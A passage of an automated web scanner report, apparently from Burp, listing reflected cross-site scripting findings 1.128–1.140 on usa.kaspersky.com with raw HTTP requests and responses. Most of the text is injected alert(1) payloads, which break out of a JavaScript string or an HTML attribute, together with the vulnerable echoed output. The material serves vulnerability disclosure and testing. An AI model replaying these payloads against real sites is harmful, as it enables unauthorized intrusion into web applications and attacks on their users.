<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.css2a37a"><script>alert(1)</script>80ab69cbec8" />
...[SNIP]...

1.128. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cbc3"-alert(1)-"ffb8450ee10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/search/search.css1cbc3"-alert(1)-"ffb8450ee10 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:08:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684909"
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Date: Sat, 18 Dec 2010 15:08:36 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.css1cbc3"-alert(1)-"ffb8450ee10";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.129. http://usa.kaspersky.com/node/5718 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5718

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbf8"-alert(1)-"e26bc2619cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodebdbf8"-alert(1)-"e26bc2619cb/5718 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685571"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:19:45 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodebdbf8"-alert(1)-"e26bc2619cb/5718";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.130. http://usa.kaspersky.com/node/5718 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5718

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2540"><script>alert(1)</script>11bcbdf1315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /noded2540"><script>alert(1)</script>11bcbdf1315/5718 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:19:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685550"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:19:15 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/noded2540"><script>alert(1)</script>11bcbdf1315/5718" />
...[SNIP]...

1.131. http://usa.kaspersky.com/node/5718 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5718

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ab0d"-alert(1)-"7cbb06cb6b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/57185ab0d"-alert(1)-"7cbb06cb6b4 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685717"
Content-Type: text/html; charset=utf-8
Content-Length: 30005
Date: Sat, 18 Dec 2010 15:22:03 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/57185ab0d"-alert(1)-"7cbb06cb6b4";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.132. http://usa.kaspersky.com/node/5718 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5718

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73f67"><script>alert(1)</script>6dcc45f954f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/571873f67"><script>alert(1)</script>6dcc45f954f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; gpv_pageName=Homepage; s_nr=1292684728722-Repeat; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.1.10.1292684729

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685696"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:21:44 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/571873f67"><script>alert(1)</script>6dcc45f954f" />
...[SNIP]...

1.133. http://usa.kaspersky.com/node/5745 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5745

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b6d4"><script>alert(1)</script>605b9212ada was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node7b6d4"><script>alert(1)</script>605b9212ada/5745 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:20:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685614"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:20:22 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node7b6d4"><script>alert(1)</script>605b9212ada/5745" />
...[SNIP]...

1.134. http://usa.kaspersky.com/node/5745 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5745

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e43"-alert(1)-"4eee862c096 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /noded2e43"-alert(1)-"4eee862c096/5745 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685661"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:21:09 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/noded2e43"-alert(1)-"4eee862c096/5745";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.135. http://usa.kaspersky.com/node/5745 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5745

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfdc7"><script>alert(1)</script>8bf77c4f6db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5745bfdc7"><script>alert(1)</script>8bf77c4f6db HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:22:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685745"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:22:31 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5745bfdc7"><script>alert(1)</script>8bf77c4f6db" />
...[SNIP]...

1.136. http://usa.kaspersky.com/node/5745 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5745

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec401"-alert(1)-"d036190c48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5745ec401"-alert(1)-"d036190c48 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.4.9.1292684745062; s_cc=true; gpv_pageName=Downloads; s_nr=1292684760925-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253Dhttp%25253A//usa.kaspersky.com/node/5745%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:22:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685762"
Content-Type: text/html; charset=utf-8
Content-Length: 30000
Date: Sat, 18 Dec 2010 15:22:47 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5745ec401"-alert(1)-"d036190c48";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.137. http://usa.kaspersky.com/node/5746 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5746

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861f9"-alert(1)-"a55d8728755 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node861f9"-alert(1)-"a55d8728755/5746 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:40:44 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686844"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:40:49 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node861f9"-alert(1)-"a55d8728755/5746";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.138. http://usa.kaspersky.com/node/5746 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5746

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b774"><script>alert(1)</script>598bcc676f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node3b774"><script>alert(1)</script>598bcc676f4/5746 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:40:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686821"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:40:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node3b774"><script>alert(1)</script>598bcc676f4/5746" />
...[SNIP]...

1.139. http://usa.kaspersky.com/node/5746 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5746

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a1e"><script>alert(1)</script>a0defd833c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/574675a1e"><script>alert(1)</script>a0defd833c7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:41:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686914"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:42:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/574675a1e"><script>alert(1)</script>a0defd833c7" />
...[SNIP]...

1.140. http://usa.kaspersky.com/node/5746 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5746

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5d41"-alert(1)-"0fb1bb0037a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5746e5d41"-alert(1)-"0fb1bb0037a HTTP/1.1
Host: usa.kaspersky.com
